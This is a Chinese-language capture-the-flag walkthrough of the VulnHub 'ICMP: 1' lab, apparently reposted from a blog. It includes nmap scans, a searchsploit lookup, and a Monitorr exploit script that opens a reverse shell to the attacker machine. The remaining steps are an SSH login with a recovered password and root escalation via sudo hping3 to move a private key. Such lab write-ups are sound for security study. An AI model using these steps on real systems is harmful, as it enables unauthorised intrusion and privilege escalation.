環境
Kali: 192.168.132.131
靶機:192.168.132.145 靶機地址:https://www.vulnhub.com/entry/icmp-1,633/
一、資訊收集
nmap -sP 192.168.132.0/24

nmap -p- -sC -sV 192.168.132.145

http://192.168.132.145/mon/

http://192.168.132.145/mon/settings.php

二、漏洞探測
searchsploit Monitorr

三、漏洞驗證

進行反彈shell
python [48980.py](http://48980.py) [http://192.168.132.145/mon/](http://192.168.132.145/mon/) 192.168.132.131 4444

獲得shell

查看當前用戶id

查看home中的問及那

crypt() 回傳一個基于標準 UNIX DES 演算法或系統上其他可用的替代演算法的散列字串
使用crypy()函式對密碼進行加密,可以判斷除圖片中為fox用戶的未加密前的原始密碼
cat devel/crypt.php

嘗試登錄
ssh [[email protected]](mailto:[email protected])

找到部分flag

四、提權
檢查當前用戶是否存在高權限命令
sudo -l

進入root用戶,存在密鑰檔案

無法查看私鑰

在開啟一個終端,在兩個終端之間,通過hping3高權限命令,進行傳輸私鑰進行查看
第一個終端

第二個終端

獲得私鑰,我們可以以 root 身份登錄

獲得root權限

五、總結
這套靶機難易程度容易,使用nmap掃描靶機,發現22、80埠,訪問網站,發現網頁存在插件,使用searchspoilt工具搜索該插件可以利用漏洞,存在可以利用漏洞,驗證漏洞,利用漏洞,獲得shell,存在sudo的hping3高權限命令,借助該命令,將私鑰傳輸到攻擊機,使用靶機私鑰進行登錄,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/302659.html
標籤:其他
上一篇:代碼審計之phpweb測驗
下一篇:APT攻擊之郵件偽造
